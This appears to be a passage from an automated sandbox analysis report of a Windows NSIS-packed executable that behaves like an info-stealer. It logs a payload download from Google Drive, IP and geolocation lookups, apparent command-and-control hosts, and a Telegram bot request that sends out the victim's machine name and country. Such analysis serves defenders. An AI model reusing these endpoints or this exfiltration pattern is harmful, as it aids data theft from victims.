            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: unknownHTTPS traffic detected: 104.21.96.1:443 -> 192.168.2.6:49692 version: TLS 1.0
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1OeLfKimg0kAhmFZKIeP6XjCcrORJLZ2v HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0Host: drive.google.comCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /download?id=1OeLfKimg0kAhmFZKIeP6XjCcrORJLZ2v&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:648351%0D%0ADate%20and%20Time:%2008/03/2025%20/%2022:26:43%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20648351%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficDNS traffic detected: DNS query: drive.google.com
            Source: global trafficDNS traffic detected: DNS query: drive.usercontent.google.com
            Source: global trafficDNS traffic detected: DNS query: checkip.dyndns.org
            Source: global trafficDNS traffic detected: DNS query: reallyfreegeoip.org
            Source: global trafficDNS traffic detected: DNS query: api.telegram.org
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Fri, 07 Mar 2025 22:18:20 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
            Source: GBYfjUz4a5.exe, 00000007.00000002.2505203474.0000000033361000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://aborters.duckdns.org:8081
            Source: GBYfjUz4a5.exe, 00000007.00000002.2505203474.0000000033361000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anotherarmy.dns.army:8081
            Source: GBYfjUz4a5.exe, 00000007.00000002.2505203474.0000000033361000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org
            Source: GBYfjUz4a5.exe, 00000007.00000002.2507440428.0000000035D52000.00000004.00000020.00020000.00000000.sdmp, GBYfjUz4a5.exe, 00000007.00000003.2268525470.0000000035D5D000.00000004.00000020.00020000.00000000.sdmp, GBYfjUz4a5.exe, 00000007.00000002.2505203474.0000000033361000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/
            Source: GBYfjUz4a5.exeString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
            Source: GBYfjUz4a5.exe, 00000007.00000002.2505203474.0000000033361000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
            Source: GBYfjUz4a5.exe, 00000007.00000002.2505203474.0000000033361000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://varders.kozow.com:8081
            Source: GBYfjUz4a5.exe, 00000007.00000002.2506408068.000000003463C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org?q=
            Source: GBYfjUz4a5.exe, 00000007.00000002.2505203474.0000000033444000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org
            Source: GBYfjUz4a5.exe, 00000007.00000002.2505203474.0000000033444000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot
            Source: GBYfjUz4a5.exe, 00000007.00000002.2505203474.0000000033444000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=
            Source: GBYfjUz4a5.exe, 00000007.00000002.2505203474.0000000033444000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:648351%0D%0ADate%20a
            Source: GBYfjUz4a5.exe, 00000007.00000003.1705150186.0000000002FE3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://apis.google.com
            Source: GBYfjUz4a5.exe, 00000007.00000002.2506408068.000000003463C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
            Source: GBYfjUz4a5.exe, 00000007.00000002.2506408068.0000000034676000.00000004.00000800.00020000.00000000.sdmp, GBYfjUz4a5.exe, 00000007.00000002.2506408068.000000003463C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
            Source: GBYfjUz4a5.exe, 00000007.00000002.2506408068.0000000034676000.00000004.00000800.00020000.00000000.sdmp, GBYfjUz4a5.exe, 00000007.00000002.2506408068.000000003463C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
            Source: GBYfjUz4a5.exe, 00000007.00000002.2505203474.00000000334F1000.00000004.00000800.00020000.00000000.sdmp, GBYfjUz4a5.exe, 00000007.00000002.2505203474.00000000334E2000.00000004.00000800.00020000.00000000.sdmp, GBYfjUz4a5.exe, 00000007.00000002.2505203474.0000000033522000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=en
            Source: GBYfjUz4a5.exe, 00000007.00000002.2505203474.00000000334E2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=en0l
            Source: GBYfjUz4a5.exe, 00000007.00000002.2505203474.00000000334F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=en4
            Source: GBYfjUz4a5.exe, 00000007.00000002.2505203474.00000000334EC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=enlB
            Source: GBYfjUz4a5.exe, 00000007.00000002.2482541121.0000000002F38000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/
            Source: GBYfjUz4a5.exe, 00000007.00000002.2482541121.0000000002F38000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/8TH
            Source: GBYfjUz4a5.exe, 00000007.00000002.2483008488.0000000004950000.00000004.00001000.00020000.00000000.sdmp, GBYfjUz4a5.exe, 00000007.00000002.2482541121.0000000002F75000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1OeLfKimg0kAhmFZKIeP6XjCcrORJLZ2v
            Source: GBYfjUz4a5.exe, 00000007.00000002.2482541121.0000000002F75000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1OeLfKimg0kAhmFZKIeP6XjCcrORJLZ2v4YV
            Source: GBYfjUz4a5.exe, 00000007.00000002.2482541121.0000000002FA0000.00000004.00000020.00020000.00000000.sdmp, GBYfjUz4a5.exe, 00000007.00000003.1759201605.0000000002FB8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/
            Source: GBYfjUz4a5.exe, 00000007.00000002.2482541121.0000000002FA0000.00000004.00000020.00020000.00000000.sdmp, GBYfjUz4a5.exe, 00000007.00000003.1759201605.0000000002FB8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/-
            Source: GBYfjUz4a5.exe, 00000007.00000003.1705150186.0000000002FE3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1OeLfKimg0kAhmFZKIeP6XjCcrORJLZ2v&export=download
            Source: GBYfjUz4a5.exe, 00000007.00000002.2482541121.0000000002F90000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1OeLfKimg0kAhmFZKIeP6XjCcrORJLZ2v&export=downloadi)
            Source: GBYfjUz4a5.exe, 00000007.00000002.2482541121.0000000002F38000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1OeLfKimg0kAhmFZKIeP6XjCcrORJLZ2v&export=downloadk)
            Source: GBYfjUz4a5.exe, 00000007.00000002.2506408068.000000003463C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
            Source: GBYfjUz4a5.exe, 00000007.00000002.2506408068.0000000034676000.00000004.00000800.00020000.00000000.sdmp, GBYfjUz4a5.exe, 00000007.00000002.2506408068.000000003463C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtabv20-
            Source: GBYfjUz4a5.exe, 00000007.00000002.2506408068.000000003463C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
            Source: GBYfjUz4a5.exe, 00000007.00000002.2506408068.000000003463C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://gemini.google.com/app?q=
            Source: GBYfjUz4a5.exe, 00000007.00000002.2505203474.00000000333AD000.00000004.00000800.00020000.00000000.sdmp, GBYfjUz4a5.exe, 00000007.00000002.2505203474.0000000033444000.00000004.00000800.00020000.00000000.sdmp, GBYfjUz4a5.exe, 00000007.00000002.2505203474.000000003341D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org
            Source: GBYfjUz4a5.exe, 00000007.00000002.2505203474.00000000333AD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/
            Source: GBYfjUz4a5.exe, 00000007.00000002.2505203474.000000003341D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189
            Source: GBYfjUz4a5.exe, 00000007.00000002.2505203474.00000000333D7000.00000004.00000800.00020000.00000000.sdmp, GBYfjUz4a5.exe, 00000007.00000002.2505203474.0000000033444000.00000004.00000800.00020000.00000000.sdmp, GBYfjUz4a5.exe, 00000007.00000002.2505203474.000000003341D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189$
            Source: GBYfjUz4a5.exe, 00000007.00000003.1705150186.0000000002FE3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ssl.gstatic.com
            Source: GBYfjUz4a5.exe, 00000007.00000002.2506408068.0000000034676000.00000004.00000800.00020000.00000000.sdmp, GBYfjUz4a5.exe, 00000007.00000002.2506408068.000000003463C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/v20
            Source: GBYfjUz4a5.exe, 00000007.00000003.1705150186.0000000002FE3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google-analytics.com;report-uri
            Source: GBYfjUz4a5.exe, 00000007.00000003.1705150186.0000000002FE3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com
            Source: GBYfjUz4a5.exe, 00000007.00000002.2506408068.0000000034676000.00000004.00000800.00020000.00000000.sdmp, GBYfjUz4a5.exe, 00000007.00000002.2506408068.000000003463C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_alldp.ico
            Source: GBYfjUz4a5.exe, 00000007.00000003.1705150186.0000000002FE3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.googletagmanager.com
            Source: GBYfjUz4a5.exe, 00000007.00000003.1705150186.0000000002FE3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com
            Source: GBYfjUz4a5.exe, 00000007.00000002.2505203474.0000000033522000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/
            Source: GBYfjUz4a5.exe, 00000007.00000002.2505203474.0000000033513000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/0l
            Source: GBYfjUz4a5.exe, 00000007.00000002.2505203474.0000000033522000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/4
            Source: GBYfjUz4a5.exe, 00000007.00000002.2505203474.000000003351D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/lB
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49689
            Source: unknownNetwork traffic detected: HTTP traffic on port 49708 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49699 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49695 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49697 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49693 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49690 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49701 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49699
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49697
            Source: unknownNetwork traffic detected: HTTP traffic on port 49707 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49705 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49695
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49693
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49692
            Source: unknownNetwork traffic detected: HTTP traffic on port 49692 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49703 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49690
            Source: unknownNetwork traffic detected: HTTP traffic on port 49689 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49708
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49707
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49705
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49703
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49701
            Source: unknownHTTPS traffic detected: 142.250.184.206:443 -> 192.168.2.6:49689 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 172.217.18.97:443 -> 192.168.2.6:49690 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.6:49708 version: TLS 1.2
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeCode function: 0_2_004052D1 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_004052D1
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeCode function: 0_2_00403358 EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcmpiW,CreateDirectoryW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess,0_2_00403358
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeCode function: 7_2_00403358 EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcmpiW,CreateDirectoryW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess,7_2_00403358
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeFile created: C:\Windows\resources\0809Jump to behavior
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeCode function: 0_2_00404B0E0_2_00404B0E
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeCode function: 0_2_0040653D0_2_0040653D
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeCode function: 7_2_00404B0E7_2_00404B0E
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeCode function: 7_2_0040653D7_2_0040653D
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeCode function: 7_2_02BDD2787_2_02BDD278
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeCode function: 7_2_02BD53707_2_02BD5370
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeCode function: 7_2_02BDC1467_2_02BDC146
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeCode function: 7_2_02BD76F17_2_02BD76F1
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeCode function: 7_2_02BDC7387_2_02BDC738
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeCode function: 7_2_02BD64987_2_02BD6498
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeCode function: 7_2_02BDC4687_2_02BDC468
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeCode function: 7_2_02BDD5487_2_02BDD548
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeCode function: 7_2_02BDCA087_2_02BDCA08
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeCode function: 7_2_02BDE9887_2_02BDE988
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeCode function: 7_2_02BDF9617_2_02BDF961
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeCode function: 7_2_02BDCFAB7_2_02BDCFAB
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeCode function: 7_2_02BD6FC87_2_02BD6FC8
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeCode function: 7_2_02BDCCD87_2_02BDCCD8
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeCode function: 7_2_02BD9DE07_2_02BD9DE0
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeCode function: 7_2_02BDB0B87_2_02BDB0B8
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeCode function: 7_2_02BD29E07_2_02BD29E0
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeCode function: 7_2_02BDE97B7_2_02BDE97B
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeCode function: 7_2_02BD3E097_2_02BD3E09
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeCode function: 7_2_02DA8FB07_2_02DA8FB0
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeCode function: 7_2_02DA7B787_2_02DA7B78
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeCode function: 7_2_02DA38B87_2_02DA38B8
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeCode function: 7_2_02DA81D07_2_02DA81D0
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeCode function: 7_2_02DA4ED07_2_02DA4ED0
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeCode function: 7_2_02DA72C87_2_02DA72C8
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeCode function: 7_2_02DA4EC07_2_02DA4EC0
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeCode function: 7_2_02DA22F07_2_02DA22F0
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeCode function: 7_2_02DAF2F07_2_02DAF2F0
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeCode function: 7_2_02DA1E987_2_02DA1E98
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeCode function: 7_2_02DAAE907_2_02DAAE90
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeCode function: 7_2_02DACE807_2_02DACE80
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeCode function: 7_2_02DA72B87_2_02DA72B8
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeCode function: 7_2_02DA1EA87_2_02DA1EA8
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeCode function: 7_2_02DAEE5F7_2_02DAEE5F
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeCode function: 7_2_02DA1A507_2_02DA1A50
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeCode function: 7_2_02DA1A417_2_02DA1A41
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeCode function: 7_2_02DA4A787_2_02DA4A78
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeCode function: 7_2_02DAAE7F7_2_02DAAE7F
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeCode function: 7_2_02DA6E727_2_02DA6E72
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeCode function: 7_2_02DA6E707_2_02DA6E70
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeCode function: 7_2_02DAEE707_2_02DAEE70
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeCode function: 7_2_02DACE6F7_2_02DACE6F
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeCode function: 7_2_02DA6A187_2_02DA6A18
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeCode function: 7_2_02DA46107_2_02DA4610
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeCode function: 7_2_02DAAA007_2_02DAAA00
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeCode function: 7_2_02DA6A077_2_02DA6A07
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeCode function: 7_2_02DA46207_2_02DA4620
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeCode function: 7_2_02DA5BD87_2_02DA5BD8
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeCode function: 7_2_02DA97C07_2_02DA97C0
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeCode function: 7_2_02DA2FF97_2_02DA2FF9
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeCode function: 7_2_02DAF7907_2_02DAF790
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeCode function: 7_2_02DAD7917_2_02DAD791
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeCode function: 7_2_02DA57807_2_02DA5780
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeCode function: 7_2_02DAF7817_2_02DAF781
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeCode function: 7_2_02DA2BB07_2_02DA2BB0
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeCode function: 7_2_02DAB7B07_2_02DAB7B0
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeCode function: 7_2_02DA97B07_2_02DA97B0
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeCode function: 7_2_02DA2BAB7_2_02DA2BAB
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeCode function: 7_2_02DAD7A07_2_02DAD7A0
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeCode function: 7_2_02DAB7A07_2_02DAB7A0
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeCode function: 7_2_02DA8FA17_2_02DA8FA1
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeCode function: 7_2_02DA27587_2_02DA2758
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeCode function: 7_2_02DA27497_2_02DA2749
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeCode function: 7_2_02DA7B737_2_02DA7B73
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeCode function: 7_2_02DA57707_2_02DA5770
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeCode function: 7_2_02DAD3107_2_02DAD310
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeCode function: 7_2_02DAB3107_2_02DAB310
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeCode function: 7_2_02DA23007_2_02DA2300
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeCode function: 7_2_02DAF3007_2_02DAF300
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeCode function: 7_2_02DAD3007_2_02DAD300
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeCode function: 7_2_02DA53287_2_02DA5328
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeCode function: 7_2_02DA77227_2_02DA7722
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeCode function: 7_2_02DA77207_2_02DA7720
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeCode function: 7_2_02DAB3207_2_02DAB320
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeCode function: 7_2_02DAC0D07_2_02DAC0D0
